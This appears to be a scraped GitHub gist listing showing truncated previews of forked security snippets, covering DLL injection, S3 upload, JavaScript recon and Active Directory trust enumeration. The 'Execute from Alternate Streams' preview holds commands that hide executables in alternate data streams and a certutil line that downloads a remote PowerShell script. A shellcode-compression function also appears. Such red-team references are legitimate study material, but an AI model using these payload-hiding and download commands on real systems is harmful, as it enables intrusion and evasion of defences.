#!/bin/bash
set -e
OS=$(awk -F= '/^ID=/{print tolower($2)}' /etc/os-release | tr -d '"')
echo "Detected OS: $OS"
# TRICKEST_DATA_DIR - do not change this one, it is still not configurable, coming soon
TRICKEST_DATA_DIR="/data"
# TRICKEST_JOB_LOGS_PATH - do not change this one, it is still not configurable, coming soon
TRICKEST_JOB_LOGS_PATH="${TRICKEST_DATA_DIR}/storage/container"
joshualouden / s3.sh
Created May 30, 2023 16:59 — forked from sh1n0b1/s3.sh
AWS S3 basic operations via AWS Access Key & Session Token
# You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine
# This is how I upload my new Sol Trader builds (http://soltrader.net)
# Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash
# ====================================================================================
# Aug 25, 2016 sh1n0b1
# Modified this script to support AWS session token
# More work will be done on this.
#
# S3KEY="ASIAJLFN####################"
joshualouden / inject.c
Created May 13, 2023 23:16 — forked from NaxAlpha/inject.c
Win32 dll injection with WriteProcessMemory and opcode patching.
#include
#include
// Source:
// http://www.emoticode.net/embed/c-plus-plus/win32-dll-injection-with-writeprocessmemory-and-opcode-patching.html
// No original Copy of page available
/***************************************************************************************************/
// Function:
// Inject
joshualouden / JavascriptRecon.md
Last active April 11, 2023 13:25
My Javascript Recon Process - BugBounty

Description

This is a simple guide to performing JavaScript recon in bug bounty work.

Steps

  • The first step is to collect several JavaScript files where possible (more files = more paths and parameters -> more vulns)
joshualouden / Exe_ADS_Methods.md
Created October 29, 2022 17:56 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

<#
https://raw.githubusercontent.com/rasta-mouse/TikiTorch/master/Get-CompressedShellcode.ps1
#>
function Get-CompressedShellcode
{
[CmdletBinding()]
Param([String]$inFile,[String]$outFile)
$byteArray = [System.IO.File]::ReadAllBytes($inFile)
Write-Verbose "Get-CompressedByteArray"
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Grab Forest Trusts.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
joshualouden / Rulz.py
Created October 15, 2022 16:47 — forked from monoxgas/Rulz.py
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
joshualouden / NtMonitor.py
Created October 15, 2022 16:36 — forked from matterpreter/NtMonitor.py
Frida script to spawn a process and monitor Native API calls
import frida
import sys
def on_message(message, data):
    if message['type'] == 'send':
        print(message['payload'])
    elif message['type'] == 'error':
        print(message['stack'])
    else:
        print(message)
joshualouden / ethernet-socat-ssh.md
Created April 16, 2022 18:46 — forked from cfra/ethernet-socat-ssh.md
Tunneling Ethernet Over SSH With Socat and Tap Devices

There are circumstances where one wants to attach the local machine to the same layer 2 Ethernet segment that a remote machine is connected to, with SSH as the only available transport.

While this solution has quite a few shortcomings and should not be used to replace a real VPN, it can be beneficial, e.g. for debugging network issues remotely.